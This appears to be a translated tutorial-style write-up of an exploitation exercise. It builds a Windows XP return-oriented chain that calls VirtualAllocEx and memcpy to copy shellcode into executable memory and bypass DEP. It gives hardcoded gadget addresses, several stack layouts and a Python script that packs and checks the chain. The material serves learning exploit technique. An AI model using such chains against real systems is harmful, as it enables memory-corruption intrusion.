RET2LIBC Exercises (3) -- VirtualAlloc

Source: Internet
Author: User

Over the National Day holiday I did a few pwn problems to keep my hand in; when I have time I will post the analysis of those pwn problems.

Bypassing DEP with VirtualAlloc works much like the previous method, which changed the page protection in place. The difference is that VirtualAlloc allocates a fresh executable region, and the shellcode then has to be copied into it, which is a little trickier than simply changing the protection of memory that already holds the shellcode.

VirtualAlloc takes four parameters:

lpAddress: the start address of the region to allocate; the experiment uses 0x00030000.

dwSize: the size of the region in bytes; the experiment uses 0xFF, chosen from the size of the shellcode.

flAllocationType: the allocation type; fixed at 0x00001000 (MEM_COMMIT).

flProtect: the memory protection; readable, writable and executable, fixed at 0x00000040 (PAGE_EXECUTE_READWRITE).

First, overwrite EIP with \x90 bytes.

Now both EBP and EIP have been overwritten, so the first job is to repair EBP with a push esp; pop ebp gadget:

"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\x92\x90\x90\x90"
"\x93\x90\x90\x90"
"\x94\x90\x90\x90"
"\x95\x90\x90\x90"
"\x96\x90\x90\x90"
"\x97\x90\x90\x90"

Continue stepping. When execution reaches the entry point of VirtualAlloc, esp = ebp + 8: the gadget copied esp into ebp, and its retn 4 then consumed eight bytes (the return address plus four more).

With EBP fixed, the positions of VirtualAlloc's four parameters are settled, and all four are known constants, so the stack can now be laid out like this:

"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\xf4\x9a\x80\x7c"   // VirtualAllocEx
"\x93\x90\x90\x90"   // discarded by the retn 4
"\xff\xff\xff\xff"   // -1 (hProcess: the current-process pseudo-handle)
"\x00\x00\x03\x00"   // lpAddress 0x00030000
"\xff\x00\x00\x00"   // dwSize 0xFF
"\x00\x10\x00\x00"   // flAllocationType 0x1000 (MEM_COMMIT)
"\x40\x00\x00\x00"   // flProtect 0x40 (PAGE_EXECUTE_READWRITE)

Point EIP at the entry of VirtualAllocEx and check in the stack window that the parameters sit where they should.

Then let VirtualAllocEx run: eax = 0x00030000, the base address of the committed region, which means the call succeeded. Control does not come straight back to the chain, though; it returns through the pop ebp; retn 10 that follows the call.

Stack state after the retn 10 has executed:

EBP has been clobbered again. Before fixing it, look at what memcpy needs: void *memcpy(void *dest, const void *src, size_t n) copies n bytes from the memory starting at src to the memory starting at dest. dest (the new region) and n are constants; only src, the address of the shellcode on the stack, has to be determined at run time, and that again goes through EBP, so EBP must be repaired first.

Can the next instruction simply be push esp; pop ebp again? In my own debugging, that approach lost control of the program later in the chain because of how memcpy's parameters have to be filled: if the source address (esp here) is pushed directly, some of the later operations no longer work. The better approach is push esp; jmp eax, which keeps control. So first find a pop eax; retn gadget and load eax with the value that will later get memcpy's start address into EIP, and only then repair EBP:

"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\xf4\x9a\x80\x7c"   // VirtualAllocEx
"\x93\x90\x90\x90"   // discarded by the retn 4
"\xff\xff\xff\xff"   // -1 (hProcess: the current-process pseudo-handle)
"\x00\x00\x03\x00"   // lpAddress 0x00030000
"\xff\x00\x00\x00"   // dwSize 0xFF
"\x00\x10\x00\x00"   // flAllocationType 0x1000 (MEM_COMMIT)
"\x40\x00\x00\x00"   // flProtect 0x40 (PAGE_EXECUTE_READWRITE)
"\x91\x90\x90\x90"
"\xdd\x6f\xfa\x77"   // pop eax; retn
"\x93\x90\x90\x90"
"\x94\x90\x90\x90"
"\x95\x90\x90\x90"
"\x96\x90\x90\x90"
"\x97\x90\x90\x90"   // placeholder value popped into eax
"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\x91\x90\x90\x90"
"\x92\x90\x90\x90"
"\x93\x90\x90\x90"
"\x94\x90\x90\x90"
"\x95\x90\x90\x90"

Stack state after execution:

Now look at the value of EBP and at memcpy's parameters: the red box in the screenshot covers memcpy's three parameters. The first (dest) and third (n) are fixed; the second (src) is the start of the data to copy, and it is written directly from esp. Ideally that would take a pop; pop; push esp; pop; pop; retn gadget, which obviously does not exist, so a single pop; retn is used instead, bringing esp to 0x0012ff00, followed by push esp; jmp eax. In the book, eax points to a pop; pop; retn, and memcpy's start address is placed in the four bytes just below the first parameter, so that the pop; pop; retn bounces memcpy's address into EIP. While writing this up it occurred to me that eax could hold memcpy's address directly; I tested that and it works too.

"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\xf4\x9a\x80\x7c"   // VirtualAllocEx
"\x93\x90\x90\x90"   // discarded by the retn 4
"\xff\xff\xff\xff"   // -1 (hProcess: the current-process pseudo-handle)
"\x00\x00\x03\x00"   // lpAddress 0x00030000
"\xff\x00\x00\x00"   // dwSize 0xFF
"\x00\x10\x00\x00"   // flAllocationType 0x1000 (MEM_COMMIT)
"\x40\x00\x00\x00"   // flProtect 0x40 (PAGE_EXECUTE_READWRITE)
"\x91\x90\x90\x90"
"\xdd\x6f\xfa\x77"   // pop eax; retn
"\x93\x90\x90\x90"
"\x94\x90\x90\x90"
"\x95\x90\x90\x90"
"\x96\x90\x90\x90"
"\x9e\x37\xfa\x77"   // value popped into eax (pop; pop; retn)
"\xe5\xe0\x72\x7d"   // push esp; pop ebp; retn 4
"\xd2\x97\xf8\x77"   // pop ebx; retn
"\x92\x90\x90\x90"
"\x00\x00\x03\x00"   // memcpy dest 0x00030000
"\xc6\xc6\xeb\x77"   // gadget used as push esp; jmp eax (unlabelled in the original)
"\xff\x00\x00\x00"   // memcpy n 0xFF
"\xb8\x1d\x92\x7c"   // memcpy

Tips: this exercise is well worth doing. The structure of the ROP chain is fairly involved and takes some skill, so debug it step by step yourself. The book appends some padding bytes at the end to make the shellcode run properly; my machine behaved differently, presumably because the gadget addresses in my chain are not the same, and my chain ran without the padding.
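To make the stack layouts above concrete, here is an added example in Python (not the book's or the author's code) that packs the final chain, prints it the way the debugger's stack window shows it, models the push esp; pop ebp; retn 4 gadget to reproduce the esp = ebp + 8 relationship used earlier, and cross-checks the VirtualAlloc parameters against the memcpy that fills the region. The stack address EIP_SLOT and the slot labels are assumptions of this example; the gadget addresses are the ones from the chain above and are specific to the author's XP build.

```python
"""Lay out and sanity-check the VirtualAlloc/memcpy DEP-bypass chain from this write-up.

Added example, not code from the book or the author. It encodes only what the
write-up states: the gadget semantics (push esp; pop ebp; retn 4), the slot
order and the constants. EIP_SLOT is an assumed stack address used for offsets.
"""
import struct

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40
SHELLCODE_LEN = 0xFF        # the write-up sizes dwSize from the shellcode
EIP_SLOT = 0x0012FEF0       # assumed stack address of the overwritten return address


def dd(value):
    """Pack one dword little-endian; each "\\xNN\\xNN\\xNN\\xNN" string in the chain is one of these."""
    return struct.pack("<I", value & 0xFFFFFFFF)


# The final chain from the write-up, one (value, label) pair per stack slot.
# Slot 0 is the dword that overwrites the saved return address (EIP).
CHAIN = [
    (0x7D72E0E5, "push esp; pop ebp; retn 4"),
    (0x7C809AF4, "VirtualAllocEx"),
    (0x90909093, "discarded by retn 4"),
    (0xFFFFFFFF, "hProcess (-1)"),
    (0x00030000, "lpAddress"),
    (0x000000FF, "dwSize"),
    (0x00001000, "flAllocationType"),
    (0x00000040, "flProtect"),
    (0x90909091, "padding"),
    (0x77FA6FDD, "pop eax; retn"),
    (0x90909093, "padding"),
    (0x90909094, "padding"),
    (0x90909095, "padding"),
    (0x90909096, "padding"),
    (0x77FA379E, "eax value (pop; pop; retn)"),
    (0x7D72E0E5, "push esp; pop ebp; retn 4"),
    (0x77F897D2, "pop ebx; retn"),
    (0x90909092, "padding"),
    (0x00030000, "memcpy dest"),
    (0x77EBC6C6, "push esp; jmp eax"),
    (0x000000FF, "memcpy n"),
    (0x7C921DB8, "memcpy"),
]


def build_chain(chain=CHAIN):
    """Serialize the chain exactly as the concatenated string literals do."""
    return b"".join(dd(value) for value, _ in chain)


def slot_addr(index, eip_slot=EIP_SLOT):
    """Stack address of chain slot `index` once the overflow has written the chain."""
    return eip_slot + 4 * index


def run_first_gadget(chain=CHAIN, eip_slot=EIP_SLOT):
    """Model the vulnerable function's ret into 'push esp; pop ebp; retn 4'."""
    esp = eip_slot + 4       # ret consumed slot 0, the gadget address
    ebp = esp                # push esp; pop ebp: ebp now points at slot 1
    eip = chain[1][0]        # retn pops slot 1 as the new eip ...
    esp += 4 + 4             # ... and the '4' discards slot 2 on top of that
    return {"eip": eip, "esp": esp, "ebp": ebp}


def ebp_layout(chain=CHAIN, eip_slot=EIP_SLOT):
    """(offset from ebp, value, label) for every slot: the callee's ebp-relative view."""
    ebp = run_first_gadget(chain, eip_slot)["ebp"]
    return [(slot_addr(i, eip_slot) - ebp, value, label)
            for i, (value, label) in enumerate(chain)]


def listing(chain=CHAIN, eip_slot=EIP_SLOT):
    """Stack dump, one line per slot, in the form the debugger's stack window shows."""
    return ["%08x  %08x  %s" % (slot_addr(i, eip_slot), value, label)
            for i, (value, label) in enumerate(chain)]


def field(chain, label):
    """Value of the first slot carrying `label`."""
    return next(value for value, l in chain if l == label)


def check_chain(chain=CHAIN, shellcode_len=SHELLCODE_LEN):
    """Cross-check the allocation against the copy that fills it; returns a list of problems."""
    problems = []
    lp, size = field(chain, "lpAddress"), field(chain, "dwSize")
    if lp & 0xFFF:
        problems.append("lpAddress 0x%08x is not page-aligned" % lp)
    if field(chain, "flAllocationType") != MEM_COMMIT:
        problems.append("flAllocationType is not MEM_COMMIT")
    if field(chain, "flProtect") != PAGE_EXECUTE_READWRITE:
        problems.append("flProtect is not PAGE_EXECUTE_READWRITE")
    if size < shellcode_len:
        problems.append("dwSize 0x%x is smaller than the shellcode" % size)
    if field(chain, "memcpy dest") != lp:
        problems.append("memcpy dest is not the allocated region")
    if field(chain, "memcpy n") > size:
        problems.append("memcpy n exceeds dwSize")
    return problems


def null_byte_slots(chain=CHAIN):
    """Indices of slots whose encoding contains 0x00 (matters only if the overflowing copy stops at NUL)."""
    return [i for i, (value, _) in enumerate(chain) if b"\x00" in dd(value)]


if __name__ == "__main__":
    for line in listing():
        print(line)
    print(run_first_gadget())
    print(check_chain() or "chain is internally consistent")
    print("slots containing 0x00:", null_byte_slots())
```

Two caveats the checker cannot see from the bytes alone. MEM_COMMIT on its own with an explicit lpAddress only succeeds if that address range is already reserved in the process, which is why a fixed address that happens to be reserved on the author's machine is used; on another build the same chain may need MEM_RESERVE | MEM_COMMIT (0x3000) or a different address. And several slots (lpAddress, dwSize, the constants) contain 0x00 bytes, so the chain only survives intact if the vulnerable copy does not stop at NUL, which the write-up does not discuss.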

